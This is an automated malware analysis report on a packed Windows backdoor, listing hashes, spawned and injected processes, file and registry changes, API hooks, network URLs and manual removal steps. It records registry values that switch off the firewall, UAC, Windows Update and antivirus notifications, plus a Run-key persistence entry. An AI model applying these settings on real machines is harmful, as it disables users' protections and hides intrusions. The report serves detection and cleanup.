Trojan.Win32.Crypt.ekm (Kaspersky), Win32.HLLM.Reset.493 (DrWeb), Trojan-FIQV!BC6C713511C1 (McAfee), Win32:Malware-gen (Avast), Backdoor.Win32.Farfli.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: c7eaad28523b7779f03e73b9525a99ab
SHA1: a145f33f1327ccae9259a16585428b94e97a8a2a
SHA256: abc6b317823823e70e73bf6fccfbacd58cfb49dc7764acb0ef3c782334e6f95d
SSDeep: 3072:SBu5NoDxvM1GjiUfMvbhINwp5JvvoO5 kbF6lnc7uvP5OiBK oCP23zAc2WzKIQ7:SwoD1kG Uohr5JvAOZR6Nca35FBuNK57
Size: 218880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-05-16 13:41:12
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables remote control of the victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
AdbeRdr1012_en_US.exe:2908
verclsid.exe:3340
verclsid.exe:3280
verclsid.exe:3208
U78n983:2324
MsiExec.exe:2132
MsiExec.exe:3836
MsiExec.exe:432
setup.exe:3420
Adobe_Updater.exe:3104
%original file name%.exe:1676
csslisog.exe:1780
csslisog.exe:3908
The Backdoor injects its code into the following process(es):
vmacthlp.exe:892
svchost.exe:1980
svchost.exe:1512
Explorer.EXE:532
services.exe:724
lsass.exe:736
svchost.exe:904
svchost.exe:988
wmiprvse.exe:1068
svchost.exe:1084
svchost.exe:1128
svchost.exe:1180
spoolsv.exe:1424
jqs.exe:1640
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process AdbeRdr1012_en_US.exe:2908 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Data1.cab (895790 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Setup.ini (498 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AcroRead.msi (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\config.bin (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\RDC.bin (114531 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\setup.exe (9595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AdobeSFX.log (6393 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AdbeRdrUpd1012.msp (115622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\installer.bin (286043 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\ABCPY.INI (1 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\25109 (0 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\15833.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\config.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\RDC.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\22395.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\installer.bin (0 bytes)
The process U78n983:2324 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (1281 bytes)
The process MsiExec.exe:3836 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~1B.tmp (968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (422180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (422180 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (0 bytes)
%System%\Elevation.tmp (0 bytes)
The process MsiExec.exe:432 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
The Backdoor deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Adobe\Updater6\AdobeESDGlobalApps.xml (0 bytes)
The process Adobe_Updater.exe:3104 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (1088 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aum.log (2309 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\crl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Data (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\ESD (0 bytes)
The process %original file name%.exe:1676 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (1281 bytes)
The process csslisog.exe:1780 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jyabgndb.exe (1281 bytes)
Registry activity
The process AdbeRdr1012_en_US.exe:2908 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C AD 33 32 65 81 C0 11 CF 1D 02 B9 FC 04 1B 9F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process verclsid.exe:3340 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 AD 5B 8E 8F 08 8A 56 5A A2 C0 B8 24 98 2B 75"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process verclsid.exe:3280 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 2A 12 F0 89 EF 9E 10 56 9A D8 C4 AC F5 E8 70"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process verclsid.exe:3208 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 1E BA C0 23 75 76 DD FC E0 0D DC 37 44 18 53"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process U78n983:2324 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 43 A5 91 06 D5 EA EF 2F 5E B2 DB 95 CD 86 A2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process MsiExec.exe:2132 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 76 12 1E 4B C6 63 FF F7 7E 96 B4 C5 FC D9 9C"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process MsiExec.exe:3836 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 B8 C3 9C 30 C0 68 40 67 F0 BD 3E C5 75 7A CA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Netscape\Netscape Navigator\Viewers]
"TYPE37" = "application/vnd.adobe.xdp"
"TYPE36" = "application/vnd.rmf"
"TYPE35" = "application/vnd.adobe.xfdf"
"TYPE34" = "application/vnd.fdf"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The Backdoor deletes the following registry key(s):
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
[HKLM\SOFTWARE\Adobe\Installer]
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Netscape\Netscape Navigator\Viewers]
"TYPE37"
"TYPE36"
"TYPE35"
"TYPE34"
The process MsiExec.exe:432 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Synchronizer"
The process setup.exe:3420 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 6E CF 7C BF A4 24 AC 72 89 DD D2 77 28 D9 AF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process vmacthlp.exe:892 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%System%\config\systemprofile\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process Adobe_Updater.exe:3104 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 1A 23 F9 3C 7A EE 5A 70 7F 88 93 DA 69 D1 F8"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{67EA19A0-CCEF-11D0-8024-00C04FD75D13} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C 42 DC F5 45 59 E7 D1 01"
"{40DD6E20-7C17-11CE-A804-00AA003CA9F6} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 E6 6F DD 77 DC 89 44 46 59 E7 D1 01"
"{ECF03A33-103D-11D2-854D-006008059367} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 E6 6F DD 77 3C 64 1E 46 59 E7 D1 01"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater6"
The process %original file name%.exe:1676 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 17 13 A6 BE 43 69 61 B0 D9 D3 F8 ED 8A 25 44"
The process csslisog.exe:1780 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B8 CB 89 5E 20 DB A9 70 1C 42 6F 64 9F EE A8"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"jfghdug_ooetvtgk" = "TRUE"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
"FirewallOverride" = "1"
"UacDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\wuauserv]
"Start" = "4"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SweGbgid" = "%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "4"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"
The process csslisog.exe:3908 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 6F BA D6 9B 68 DC 11 CA D3 70 DE 08 65 4E 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
MD5 | File path |
---|---|
020bc0a588b9685208985934b21af1a6 | c:\Documents and Settings\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\setup.exe |
a8fd47ec1de9369f835bd707bd5f4ddb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\AdbeRdr1012_en_US.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Backdoor installs the following user-mode hooks in USER32.dll:
TranslateMessage
The Backdoor installs the following user-mode hooks in WS2_32.dll:
WSASendTo
WSARecvFrom
WSASend
recv
WSARecv
send
closesocket
recvfrom
sendto
The Backdoor installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
AdbeRdr1012_en_US.exe:2908
verclsid.exe:3340
verclsid.exe:3280
verclsid.exe:3208
U78n983:2324
MsiExec.exe:2132
MsiExec.exe:3836
MsiExec.exe:432
setup.exe:3420
Adobe_Updater.exe:3104
%original file name%.exe:1676
csslisog.exe:1780
csslisog.exe:3908
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Data1.cab (895790 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Setup.ini (498 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AcroRead.msi (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\config.bin (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\RDC.bin (114531 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\setup.exe (9595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AdobeSFX.log (6393 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AdbeRdrUpd1012.msp (115622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\installer.bin (286043 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\ABCPY.INI (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~1B.tmp (968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (422180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (422180 bytes)
%Documents and Settings%\%current user%\Favorites (4 bytes)
%Program Files%\Common Files\System\ado\msadrh15.dll.new (114 bytes)
%Program Files%\Common Files\System\directdb.dll.new (1202 bytes)
%Program Files%\Common Files\System\Ole DB\msdaosp.dll (2854 bytes)
%System%\dllcache\msdaenum.dll.new (8 bytes)
%Program Files%\Common Files\System\Ole DB\msdaps.dll (4038 bytes)
%Program Files%\Internet Explorer\Connection Wizard (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\updater.log (10010 bytes)
%Documents and Settings%\ALL USERS (4 bytes)
%Program Files%\Common Files\VMware\Drivers\scsi (4 bytes)
%System%\dllcache\msader15.dll.new (48 bytes)
%Program Files%\Common Files\VMware\Drivers\Virtual Printer\TPOG3\i386 (4 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
%Program Files%\Common Files\System\Ole DB\msdaora.dll (4646 bytes)
%System%\dllcache\dao360.dll (6722 bytes)
%Program Files%\Common Files\Microsoft Shared\Speech\sapi.dll (20934 bytes)
%Program Files%\Common Files\Java\JAVA UPDATE (4 bytes)
%Program Files%\Common Files\System\wab32.dll (11654 bytes)
%Program Files%\Internet Explorer\Connection Wizard\RCX16B.tmp (1429 bytes)
%System%\dllcache\msaddsr.dll (48 bytes)
%System%\dllcache\msdadc.dll (8 bytes)
%Program Files%\Common Files\Adobe\ARM\1.0 (4 bytes)
%Program Files%\Internet Explorer\Connection Wizard\inetwiz.exe (2566 bytes)
%Program Files%\Common Files\System\msadc\msdarem.dll (4214 bytes)
%Program Files%\Common Files\System\ado\msjro.dll (4056 bytes)
%WinDir%\Temp\Perflib_Perfdata_668.dat (4 bytes)
%Program Files%\Common Files\Adobe\Acrobat\ActiveX (4 bytes)
%System%\dllcache\msdasc.dll.new (8 bytes)
%Program Files%\Common Files\System\Ole DB\msdaora.dll.new (2562 bytes)
%Program Files%\Common Files\System\msadc\msdfmap.dll (2638 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%Program Files%\Common Files\System\Ole DB\msdatl3.dll.new (1202 bytes)
%Program Files%\Common Files\MSSoap\Binaries\Resources\1033\mssoapr.dll (23 bytes)
%Documents and Settings%\%current user%\SendTo (4 bytes)
%Program Files%\Common Files\System\Ole DB\sqloledb.dll (10886 bytes)
%Program Files%\Common Files\System\ado\msado15.dll (10134 bytes)
%WinDir%\Prefetch\PERL.EXE-28C02382.pf (1202 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\PLUG_INS3D (4 bytes)
%Program Files%\Common Files\Microsoft Shared\DW (4 bytes)
%System%\dllcache\msadcor.dll.new (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\trialoc.dll (2566 bytes)
C:\$Directory (4 bytes)
%Program Files%\Internet Explorer\IEXPLORE.EXE (2854 bytes)
%Program Files%\Common Files\System\msadc\msadcs.dll (2854 bytes)
C:\PROGRAM FILES (4 bytes)
%Program Files%\Common Files\System\msadc\msadco.dll.new (1346 bytes)
%Program Files%\Common Files\System\Ole DB\oledb32.dll (5488 bytes)
%Program Files%\Common Files\Microsoft Shared\Speech\sapisvr.exe (2638 bytes)
%System%\config (100 bytes)
%WinDir%\Installer\$PatchCache$\Managed (4 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwhelp.dll (3552 bytes)
%Program Files%\Common Files\VMware\Drivers\vmxnet3 (4 bytes)
%Program Files%\Common Files\System\ado\msadomd.dll (5384 bytes)
%Program Files%\Common Files\System\msadc\msadds.dll (4952 bytes)
%Program Files%\Common Files\System\ado\msado15.dll.new (6722 bytes)
%Program Files%\Common Files\System\Ole DB\sqlxmlx.dll (4646 bytes)
%Program Files%\Common Files\MSSoap\Binaries\wisc10.dll (2566 bytes)
%Program Files%\Common Files\System\msadc\msdarem.dll.new (1202 bytes)
%System%\dllcache\fp4autl.dll (8370 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mtjjyklc.log (4 bytes)
%System%\dllcache\msdaorar.dll (32 bytes)
%Program Files%\Internet Explorer\iedw.exe (2566 bytes)
%Program Files%\Common Files\MSSoap\Binaries\mssoap1.dll (6600 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwutil.dll (2854 bytes)
%System%\config\SysEvent.Evt (4000 bytes)
%Program Files%\COMMON FILES (12 bytes)
%Program Files%\Common Files\SpeechEngines\Microsoft\TTS\1033\spttseng.dll (25656 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwconn2.exe (4830 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%Program Files%\Common Files\Microsoft Shared\VGX\vgx.dll (15042 bytes)
%Program Files%\Common Files\System\ado\msadox.dll (4038 bytes)
%Program Files%\Common Files\System\Ole DB\msdaosp.dll.new (1202 bytes)
%Program Files%\Common Files\Microsoft Shared\OFFICE14\1033 (4 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\plug_ins (4 bytes)
%Program Files%\Common Files\System\msadc\msadcs.dll.new (106 bytes)
%Program Files%\Common Files\MSSoap\Binaries\wisc10.dll.new (56 bytes)
%Program Files%\Common Files\System\Ole DB\MSDAIPP.DLL (10886 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwconn1.exe (4646 bytes)
%Program Files%\Common Files\System\Ole DB\msdaps.dll.new (2562 bytes)
%Program Files%\Common Files\System\Ole DB\msdasql.dll (6918 bytes)
%Program Files%\Common Files\System\ado\msadox.dll.new (2562 bytes)
%Program Files%\Common Files\SpeechEngines\Microsoft\spcommon.dll (4056 bytes)
%Program Files%\Common Files\System\msadc\msadce.dll (6726 bytes)
%Program Files%\Common Files\System\Ole DB\oledb32r.dll (65 bytes)
%WinDir%\inf (400 bytes)
%System%\dllcache\msdaer.dll.new (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\7fe17d887612.log (578 bytes)
%Program Files%\Common Files\System\ado\msador15.dll (2968 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aumLib.log (1203 bytes)
%Program Files%\Common Files\System\msadc\msadcf.dll (2854 bytes)
%Program Files%\Common Files\System\msadc\msdaprst.dll.new (2562 bytes)
%Program Files%\Common Files\Microsoft Shared\Triedit\triedit.dll (1346 bytes)
%Program Files%\Adobe\Reader 10.0\Resource (4 bytes)
%Program Files%\Common Files\Microsoft Shared\MSInfo\msinfo32.exe (1440 bytes)
%System%\dllcache\mssoapr.dll (48 bytes)
%Program Files%\Common Files\VMware\Drivers\VIDEO_XPDM (4 bytes)
%System%\dllcache\msdaprsr.dll.new (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwdl.dll (2566 bytes)
%Program Files%\Internet Explorer\HMMAPI.DLL (2566 bytes)
%System%\dllcache\msdasqlr.dll (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\isignup.exe (2566 bytes)
C:\Config.Msi (868 bytes)
%System%\dllcache\msdaremr.dll.new (32 bytes)
%Program Files%\Common Files\Microsoft Shared\Triedit\TRIEDIT.DLL (872 bytes)
%Program Files%\Common Files\System\Ole DB\RCX15F.tmp (3365 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (1088 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aum.log (2309 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jyabgndb.exe (1281 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SweGbgid" = "%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 143360 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 147456 | 208896 | 206336 | 5.45775 | 38dcd0b41f462be95215c047d40da3e4 |
.rsrc | 356352 | 4096 | 2560 | 2.65153 | 7512018f609f84d73448748b8bcf00d5 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://e4937.d.akamaiedge.net/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe | |
hxxp://a1953.d.akamai.net/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe | |
hxxp://e6845.dscb1.akamaiedge.net/pca3.crl | |
hxxp://e6845.dscb1.akamaiedge.net/CSC3-2009-2.crl | |
hxxp://ardownload.adobe.com/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe | 212.30.134.183 |
hxxp://crl.verisign.com/pca3.crl | 23.37.37.163 |
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl | 23.37.37.163 |
hxxp://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe | 2.16.186.8 |
google.com | 216.58.209.174 |
gugendolik.com | 188.93.211.67 |
